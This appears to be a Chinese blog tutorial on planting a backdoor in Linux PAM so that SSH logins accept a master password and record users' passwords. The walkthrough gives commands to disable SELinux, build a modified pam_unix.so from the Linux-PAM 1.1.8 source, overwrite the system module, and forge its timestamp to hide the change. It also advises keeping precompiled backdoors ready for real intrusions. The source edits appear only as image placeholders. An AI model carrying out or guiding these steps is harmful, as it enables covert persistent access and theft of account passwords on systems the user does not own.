PAM是Linux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码,记录登陆密码等功能。

1、在centos中需要关闭selinux。
在这里插入图片描述

永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。

2、查看PAM版本。

rpm -qa|grep pam

源码下载地址:http://www.linux-pam.org/library/
在这里插入图片描述

3、解压。

wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz
tar zxvf Linux-PAM-1.1.8.tar.gz

在这里插入图片描述
4、安装gcc编译器等。

yum install gcc flex flex-devel -y

5、修改Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c源码,实现万能密码和记录密码功能。
在这里插入图片描述
在这里插入图片描述
6、编译生成so文件。

cd Linux-PAM-1.1.8
./configure --prefix=/user --exec-prefix=/usr --localstatedir=/var --sysconfdir=/etc --disable-selinux --with-libiconv-prefix=/usr
make

生成恶意so文件的路径为:
Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so
在这里插入图片描述
查找系统原版so文件路径。

find / -name "pam_unix.so"

在这里插入图片描述

7、备份原pam文件和替换恶意pam文件。

cp /usr/lib64/security/pam_unix.so /tmp/so.bak
cp /root/Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /usr/lib64/security/pam_unix.so

在这里插入图片描述
8、尝试使用密码"zhimakaimen"登录,成功登录。
在这里插入图片描述
9、模拟正常ssh登录,成功记录到root账号密码。
在这里插入图片描述10、修改时间戳,隐匿痕迹。

touch pam_unix.so -r pam_umask.so

在这里插入图片描述
可事先编译好so后门文件,实战中替换即可。

ubuntu16下直接copy相同so文件,实测成功。
在这里插入图片描述
参考:
https://y4er.com/post/linux-backdoor-pam/

Logo
Linux

更多推荐

Linux虚拟文件系统之文件系统卸载(sys_umount())

Linux中卸载文件系统由umount系统调用实现,入口函数为sys_umount()。较于文件系统的安装较为简单,下面是具体的实现。1. /*sys_umont系统调用*/2. SYSCALL_DEFINE2(umount, char __user *, name, int, flags)3. {4.struct path path;

avatar Linux

网卡速率和双工模式的配置

http://linux.chinaitlab.com/system/792187.html1、mii-tool 配置网络设备协商方式的工具;    1.1 mii-tool 介绍;    mii-tool - view, manipulate media-independent interface status (mii-tool 是查看,管理介质的网络接口的状态)

avatar Linux

Linux系统下超级终端Minicom的使用方法(例如:连接交换机,路由器等)转http://baike.baidu.com/view/2911642.htm?fr=ala0_1

<br />  Linux系统下超级终端Minicom的使用方法 <br />  Linux下的Minicom的功能与下的超级终端功能相似,适于在通过超级终端对设备的管理以及对嵌入操作系统的升级,现写出Minicom的使用手册: <br />  1. 启动minicom <br />  以root权限登录系统 <br />  使用命令 <br />  minicom –s 则minicom启动,屏

avatar Linux